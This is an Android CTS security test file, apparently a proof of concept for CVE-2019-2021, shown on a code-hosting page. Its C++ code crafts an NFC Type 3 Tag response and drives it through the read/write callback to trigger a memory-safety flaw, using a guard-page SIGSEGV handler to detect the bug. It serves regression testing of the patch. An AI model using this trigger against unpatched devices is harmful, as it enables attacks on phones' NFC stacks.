werunplugged/unplugged-system
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
06ee9615ad
unplugged-system/cts/hostsidetests/securitybulletin/securityPatch/CVE-2019-2021/poc.cpp

140 lines
4.0 KiB
C++
Raw Blame History

/*
* Copyright (C) 2021 The Android Open Source Project
*
* Licensed under the Apache License, Version 2.0 (the "License");
* you may not use this file except in compliance with the License.
* You may obtain a copy of the License at
*
* http://www.apache.org/licenses/LICENSE-2.0
*
* Unless required by applicable law or agreed to in writing, software
* distributed under the License is distributed on an "AS IS" BASIS,
* WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
* See the License for the specific language governing permissions and
* limitations under the License.
*/
#include <stdlib.h>
#include <nfc_int.h>
#include <rw_int.h>
#include <unistd.h>
#include "../includes/common.h"
#include "../includes/memutils.h"
char enable_selective_overload = ENABLE_NONE;
char *vulnPtr = nullptr;
bool testInProgress = false;
struct sigaction new_action, old_action;
void sigsegv_handler(int signum, siginfo_t *info, void* context) {
if (testInProgress && info->si_signo == SIGSEGV) {
size_t pageSize = getpagesize();
if (pageSize) {
char *vulnPtrGuardPage = (char *) ((size_t) vulnPtr & PAGE_MASK) + pageSize;
char *faultPage = (char *) ((size_t) info->si_addr & PAGE_MASK);
if (faultPage == vulnPtrGuardPage) {
(*old_action.sa_sigaction)(signum, info, context);
return;
}
}
}
_exit(EXIT_FAILURE);
}
extern tRW_CB rw_cb;
extern tNFC_CB nfc_cb;
tNFC_CONN *p_data;
void rw_init(void);
tNFC_STATUS rw_t3t_select(uint8_t peer_nfcid2[NCI_RF_F_UID_LEN],
uint8_t mrti_check, uint8_t mrti_update);
void *allocate_memory(size_t size) {
void *ptr = memalign(16, size);
memset(ptr, 0x0, size);
return ptr;
}
/* States */
enum {
RW_T3T_STATE_NOT_ACTIVATED,
RW_T3T_STATE_IDLE,
RW_T3T_STATE_COMMAND_PENDING
};
/* Enumeration of API commands */
enum {
RW_T3T_CMD_DETECT_NDEF,
RW_T3T_CMD_CHECK_NDEF,
RW_T3T_CMD_UPDATE_NDEF,
RW_T3T_CMD_CHECK,
RW_T3T_CMD_UPDATE,
RW_T3T_CMD_SEND_RAW_FRAME,
RW_T3T_CMD_GET_SYSTEM_CODES,
RW_T3T_CMD_FORMAT,
RW_T3T_CMD_SET_READ_ONLY_SOFT,
RW_T3T_CMD_SET_READ_ONLY_HARD,
RW_T3T_CMD_MAX
};
void poc_cback(tRW_EVENT event, tRW_DATA* p_rw_data) {
(void)event;
(void)p_rw_data;
free(p_data->data.p_data);
free(p_data);
}
void GKI_start_timer(uint8_t, int32_t, bool) {
}
void GKI_stop_timer(uint8_t) {
}
int main() {
sigemptyset(&new_action.sa_mask);
new_action.sa_flags = SA_SIGINFO;
new_action.sa_sigaction = sigsegv_handler;
sigaction(SIGSEGV, &new_action, &old_action);
tRW_T3T_CB* p_t3t = &rw_cb.tcb.t3t;
GKI_init();
rw_init();
rw_cb.p_cback = &poc_cback;
uint8_t peer_nfcid2[NCI_RF_F_UID_LEN];
uint8_t mrti_check = 1, mrti_update = 1;
enable_selective_overload = ENABLE_MEMALIGN_CHECK;
FAIL_CHECK((rw_t3t_select(peer_nfcid2, mrti_check, mrti_update) == NFC_STATUS_OK));
p_data = (tNFC_CONN *) allocate_memory(sizeof(tNFC_CONN));
FAIL_CHECK(p_data);
p_data->data.p_data = (NFC_HDR *) allocate_memory(sizeof(NFC_HDR) * 3);
enable_selective_overload = ENABLE_FREE_CHECK | ENABLE_REALLOC_CHECK;
if (!(p_data->data.p_data)) {
free(p_data);
FAIL_CHECK(p_data->data.p_data);
}
vulnPtr = (char *)p_data->data.p_data;
p_data->status = NFC_STATUS_OK;
p_t3t->rw_state = RW_T3T_STATE_COMMAND_PENDING;
p_t3t->cur_cmd = RW_T3T_CMD_DETECT_NDEF;
NFC_HDR* p_msg = (p_data->data).p_data;;
p_msg->len = T3T_MSG_RSP_COMMON_HDR_LEN;
uint8_t* p_t3t_rsp = (uint8_t*) (p_msg + 1) + (p_msg->offset + 1);
p_t3t_rsp[T3T_MSG_RSP_OFFSET_RSPCODE] = T3T_MSG_OPC_CHECK_RSP;
p_t3t_rsp[T3T_MSG_RSP_OFFSET_STATUS1] = T3T_MSG_RSP_STATUS_OK;
tNFC_CONN_CB* p_cb = &nfc_cb.conn_cb[NFC_RF_CONN_ID];
tNFC_CONN_EVT event = NFC_DATA_CEVT;
memcpy(p_t3t->peer_nfcid2, &p_t3t_rsp[T3T_MSG_RSP_OFFSET_IDM],
NCI_NFCID2_LEN);
testInProgress = true;
p_cb->p_cback(0, event, p_data);
testInProgress = false;
return EXIT_SUCCESS;
}
Reference in New Issue View Git Blame Copy Permalink